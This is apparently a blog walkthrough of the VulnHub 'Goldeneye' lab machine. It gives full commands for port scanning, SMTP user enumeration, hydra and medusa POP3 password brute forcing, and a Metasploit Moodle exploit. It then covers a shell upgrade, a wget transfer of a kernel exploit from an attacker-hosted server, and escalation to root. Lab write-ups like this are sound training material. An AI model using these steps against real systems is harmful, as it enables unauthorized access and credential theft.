In this walkthrough, we’ll be looking at Goldeneye from VulnHub. This one was a lot of fun simply because of the flavor. It felt a lot like the OSCP labs as well. So let’s get started!
A typical Nmap scan reveals a few ports – 80 and 25.
nmap -sC -sV -v 192.168.109.133
We’ll check out the webpage but first let’s get another scan going in the background
nmap -sC -sV -v -p- 192.168.109.133
This will search for all ports not just the top 1000 while we do other things.
Navigating to the webpage gives us a fun taste of the box theme.
It also gives a directory to browse. Let’s see what’s there.
Well we don’t have any creds to try right now so we’ll come back later. Let’s look at the source of the home page first.
There’s not much here but let’s see what terminal.js is.
Here we have something interesting. It looks like we have two user names and one encoded password.
I’m going to use BurpSuite to decode it. Once BurpSuite is open, navigate to the Decoder tab and paste in the encoded string. Then click on the Decode as drop down on the right and select HTML. This reveals the password of InvincibleHack3r.
Now let’s try that login again.
It works and we get some more fun stuff and some hints. It’s a good thing we have our scanner going.
Before we leave let’s check the source of this page. Not much is here but at the bottom we do find out that Boris and Natalya are supervisors.
Now let’s go back to our nmap scan and see if it found the pop3 ports.
It looks like it did. Unfortunately, the password for Boris doesn’t work.
At this point, we have things we can do and since they might take a little time, let’s get them going at the same time.
First, we’ll get a pop3 brute force going. This is actually where I first ran into trouble. It’s very important to pick a good wordlist here. A lot of times I’ll just use the rockyou wordlist and go do something else while it churns away. In this case, it’s not an option. Hydra will crash after a couple minutes but it will give a suggestion to use a shorter wordlist (this is critical). Medusa won’t crash but it will throw errors and recover so I went with Medusa instead. The problem is still a short password list. I ended up using a password top 10,000 from SecLists, but even that was too big, and I missed out on getting the password for Boris. His password wasn’t critical though. The password list that ultimately works the best in this case is called fasttrack.txt. It’s native to Kali unlike SecLists which is cloned from GitHub.
Ok so now we have a wordlist, but we need to pick our users. We could do all of them since the list is so short, but the webpage said Boris and Natalya were the administrators to send email to. The nice thing is that we can check their names first. Remember the smtp server on port 25. Let’s see who’s valid.
Using netcat (nc -nv 192.168.109.133 25) we can log into the smtp server. Using vrfy USERNAME we can check the response from the server. Boris and Natalya come back but the others do not. There no sense wasting time brute forcing users that don’t exists so let’s just create a text file with there names only.
Now we can use hydra or medusa to run through the password list.
hydra -L users -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007
medusa -U users -P /usr/share/wordlists/fasttrack.txt -h 192.168.109.133 -n 55007 -M pop3 -t 16
With hydra, you’ll want to keep the user names separate because it will crash. At least it did for me, and it won’t recover. Doing one at a time, it won’t run into issues before it finds the passwords.
Medusa will also have issues, but it will recover and continue, and you can do both names together.
Either way, after a couple minutes you’ll have passwords for both Boris and Natalya. For all Natalya’s trash talking, her password is actually worse than Boris.
Anyway, we’ll just let the brute force run while we do this other stuff.
Next we can start gobuster on the website to see if there are any other hidden directories. gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.109.133 (It won’t find anything)
Finally, we’ll start a nikto scan on the website while we guess passwords. nikto -h 192.168.109.133
This finds a fun page called /splashAdmin.php which gives us some more potential user names and a really good hint we’ll need later.
Users – Xenia and Janus
Hint – GCC is replaced with the FreeBSD alternative (A quick google search shows this as cc.)
By now our password brute force should be finished and we can put those credentials to good use.
Let’s log into the pop3 server and check out some emails.
nc -nv 192.168.109.133 55007
There’s some fun theme stuff here, but nothing important. Let’s do the same with Natalya’s account.
Now we’re getting somewhere. We have a new page to check and some account creds. You will have to edit the etc/hosts file first as the email suggests. Then navigate to the site.
At the bottom of the page you can find it’s running moodle. Once logged in it looks like there’s a message from Dr. Doak. Clicking on the contact information shows that his email username is doak.
Let’s see how secure his password is.
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007
These secret agents really need to pick better passwords. Well let’s see what’s in his email.
Ok now we have some admin creds. Let’s log back into the website with these and see what we can find. Inside a page called My private files is a secret.txt file. Let’s see what’s in it.
Let’s view the file
Hmmm … that doesn’t seem too special. Maybe there’s more to it. Let’s download it and see what else we can find.
We can either run file or exiftool. Either way a base64 encoded string can be found in the image description.
Decoding this reveals a password for the admin account.
echo eFdpbnRlcjE5OTV4IQ== | base64 -d
Let’s log in one more time as the admin.
Now we can easily identify the Moodle version.
A quick Google search reveals that this version is exploitable and there’s a Metasploit module for it. You could also just search for it in Metasploit.
There is one important thing to point out with this module. The target id must be set manually. I know it says 0 is automatic, but it doesn’t work right and will fail. So just set the target to 0 before you run the exploit.
There’s one more thing you’ll have to do to get this to work. The spell check engine must be set to PSpellShell. If you look at the exploit code, it looks like this should be set during exploitation, but it’s not and you have set in manually.
Once this is set run the exploit and you should get a shell.
Now I’ll upgrade my shell using python. It’s not really necessary for this box, but it’s still nicer to work with.
python -c ‘import pty; pty.spawn(“/bin/bash”)’
There are a couple scripts I usually download and run at this point, but it turns out they are not super helpful. The exploits are there but buried. It was much easier to find by enumerating the kernel manually.
The first search that pops up looks like it fits.
It’s C code so let’s use GCC and compile it on our box.
It gives some warnings, but it looks like it compiled. Let’s see if it works.
I stated a python server and used wget to transfer the file.
Attcker box: python -m SimpleHTTPServer 80
Victim box: wget 192.168.109.128/a.out
Chmod +x a.out
When we run it, it doesn’t work. One of the error messages is gcc: not found.
That’s odd right? Let’s look at the code and search for gcc.
So the code is compiling something else when it runs. Remember the hint about gcc being removed. The compiler on this box is cc. Let’s change the compiler in the code to cc and see if it works.
Just FYI: the script may freeze the shell. If it does, you’ll have to manually clean up the files and directories left by the exploit before trying the new version.
Once the new version using cc is run, a root shell spawns.
The root flag is hidden. Use ls -lah to find it.
The final reward is in a web directory you might have found earlier, but if not, take a look at the ending scene.
Well that was Goldeneye. The word list thing was a little frustrating, but theme of the box was really fun. Anyway, I hope you enjoyed the walkthrough. If you’d like to see a video walkthrough you can find it here. In the video, I also show how to get a shell without using Metasploit.